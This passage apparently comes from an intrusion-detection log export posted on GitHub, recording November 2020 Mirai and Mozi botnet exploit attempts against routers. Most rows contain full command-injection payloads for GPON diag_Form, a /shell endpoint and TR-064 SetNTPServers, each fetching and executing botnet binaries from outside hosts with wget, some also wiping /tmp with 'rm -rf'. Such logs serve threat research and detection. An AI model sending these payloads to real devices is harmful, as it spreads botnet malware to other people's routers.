Accept-Encoding: gzip, deflate | |
Accept: */* | |
User-Agent: Hello, World | |
Content-Length: 118 | |
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://31.163.149.159:47455/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0","/GponForm/diag_Form?images/","PJSC Rostelecom",Dalmatovo,12389 | |
"Nov 3, 2020 @ 14:53:25.000","ET SCAN Mirai Variant User-Agent (Inbound)","XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://27.197.17.10:42974/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0","27.197.17.10",37956,China,,"/GponForm/diag_Form?images/","CNCGROUP China169 Backbone",,4837 | |
"Nov 3, 2020 @ 12:46:32.796","ET SCAN Mirai Variant User-Agent (Inbound)",,"76.66.194.124",45317,Canada,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","Bell Canada",Montreal,577 | |
"Nov 3, 2020 @ 12:45:40.126","ET SCAN Mirai Variant User-Agent (Inbound)",,"156.211.174.220",48549,Egypt,"GET /shell?cd+/tmp;rm+-rf+*;wget+185.239.242.121/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+185.239.242.121/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","TE Data",Bilbeis,8452 | |
"Nov 3, 2020 @ 05:58:19.853","ET SCAN Mirai Variant User-Agent (Inbound)","XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://125.43.94.31:36438/Mozi.m+-O+->/tmp/gpon80;s","125.43.94.31",42953,China,"POST /GponForm/diag_Form?images/ HTTP/1.1 | |
Host: 127.0.0.1:80 | |
Connection: keep-alive | |
Accept-Encoding: gzip, deflate | |
Accept: */* | |
User-Agent: Hello, World | |
Content-Length: 118 | |
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://125.43.94.31:36438/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0","/GponForm/diag_Form?images/","CNCGROUP China169 Backbone",Luoyang,4837 | |
"Nov 2, 2020 @ 20:01:22.000","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://211.248.241.116:50600/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","211.248.241.116",32974,"South Korea","POST /UD/act?1 HTTP/1.1 | |
Host: 127.0.0.1:5555 | |
User-Agent: Hello, world | |
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers | |
Content-Type: text/xml | |
Content-Length: 640 | |
<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://211.248.241.116:50600/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","/UD/act?1","Korea Telecom","Jongno-gu",4766 | |
"Nov 2, 2020 @ 19:19:03.812","ET SCAN Mirai Variant User-Agent (Inbound)",,"41.42.41.41",34223,Egypt,"GET /shell?cd+/tmp;rm+-rf+*;wget+185.239.242.121/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+185.239.242.121/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","TE Data",,8452 | |
"Nov 2, 2020 @ 18:01:20.778","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://61.52.49.50:34042/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","61.52.49.50",56168,China,"POST /UD/act?1 HTTP/1.1 | |
Host: 127.0.0.1:7574 | |
User-Agent: Hello, world | |
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers | |
Content-Type: text/xml | |
Content-Length: 640 | |
<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://61.52.49.50:34042/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","/UD/act?1","CNCGROUP China169 Backbone",Zhengzhou,4837 | |
"Nov 2, 2020 @ 17:20:08.176","ET SCAN Mirai Variant User-Agent (Inbound)",,"116.92.212.66",40698,"Hong Kong","GET /shell?cd+/tmp;rm+-rf+*;wget+198.98.62.137/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+198.98.62.137/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","8/F KITEC",Central,2706 | |
"Nov 2, 2020 @ 14:31:48.000","ET SCAN Mirai Variant User-Agent (Inbound)","XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://182.58.207.201:41876/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0","182.58.207.201",41888,India,,"/GponForm/diag_Form?images/","Mahanagar Telephone Nigam Limited",Mumbai,17813 | |
"Nov 2, 2020 @ 12:27:22.301","ET SCAN Mirai Variant User-Agent (Inbound)",,"27.184.26.136",48052,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws",Chinanet,Shijiazhuang,4134 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment